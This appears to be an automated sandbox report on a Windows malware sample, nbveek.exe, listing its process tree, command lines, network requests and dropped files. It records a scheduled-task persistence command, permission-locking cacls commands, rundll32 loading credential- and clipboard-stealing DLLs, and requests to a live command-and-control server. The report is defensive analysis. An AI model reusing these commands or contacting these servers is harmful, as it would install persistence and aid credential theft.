Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | March 22, 2023, 5:26 p.m. | March 22, 2023, 5:30 p.m. |
-
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
3040 -
cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "test22:N"&&CACLS "..\16de06bfb4" /P "test22:R" /E&&Exit
940-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1264 -
cacls.exe CACLS "nbveek.exe" /P "test22:N"
148 -
cacls.exe CACLS "nbveek.exe" /P "test22:R" /E
2212 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2432 -
cacls.exe CACLS "..\16de06bfb4" /P "test22:N"
2468 -
cacls.exe CACLS "..\16de06bfb4" /P "test22:R" /E
2640
-
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
2888-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
2484
-
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main
2632
-
-
-
-
jgzhang.exe "C:\Users\test22\AppData\Local\Temp\jgzhang.exe" -h
2996
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
j.ffbbjjkk.com | 172.67.158.22 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49169 104.21.8.227:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=*.ffbbjjkk.com | 8a:a5:6d:82:a6:a0:20:43:b2:b0:7e:aa:9a:9f:c2:ad:00:dd:fe:84 |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe |
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://77.73.134.27/8bmdh3Slb2/index.php | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://77.73.134.27/8bmdh3Slb2/index.php?scr=1 | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.73.134.27/8bmdh3Slb2/Plugins/cred64.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.73.134.27/8bmdh3Slb2/Plugins/clip64.dll |
request | POST http://77.73.134.27/8bmdh3Slb2/index.php |
request | POST http://77.73.134.27/8bmdh3Slb2/index.php?scr=1 |
request | GET http://77.73.134.27/8bmdh3Slb2/Plugins/cred64.dll |
request | GET http://77.73.134.27/8bmdh3Slb2/Plugins/clip64.dll |
request | GET https://j.ffbbjjkk.com/2701.html |
request | GET https://j.ffbbjjkk.com/logo.png |
request | POST http://77.73.134.27/8bmdh3Slb2/index.php |
request | POST http://77.73.134.27/8bmdh3Slb2/index.php?scr=1 |
description | nbveek.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds |
file | C:\Users\test22\AppData\Roaming\07c6bc37dc5087\cred64.dll |
file | C:\Users\test22\AppData\Local\Temp\Player3.exe |
file | C:\Users\test22\AppData\Local\Temp\jgzhang.exe |
file | C:\Users\test22\AppData\Roaming\07c6bc37dc5087\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\ss31.exe |
file | C:\Users\test22\AppData\Local\Temp\db.dll |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "test22:N"&&CACLS "..\16de06bfb4" /P "test22:R" /E&&Exit |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F |
file | C:\Users\test22\AppData\Local\Temp\Player3.exe |
file | C:\Users\test22\AppData\Local\Temp\jgzhang.exe |
file | C:\Users\test22\AppData\Local\Temp\ss31.exe |
file | C:\Users\test22\AppData\Local\Temp\jgzhang.exe |
file | C:\Users\test22\AppData\Local\Temp\db.dll |
file | C:\Users\test22\AppData\Roaming\07c6bc37dc5087\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\Player3.exe |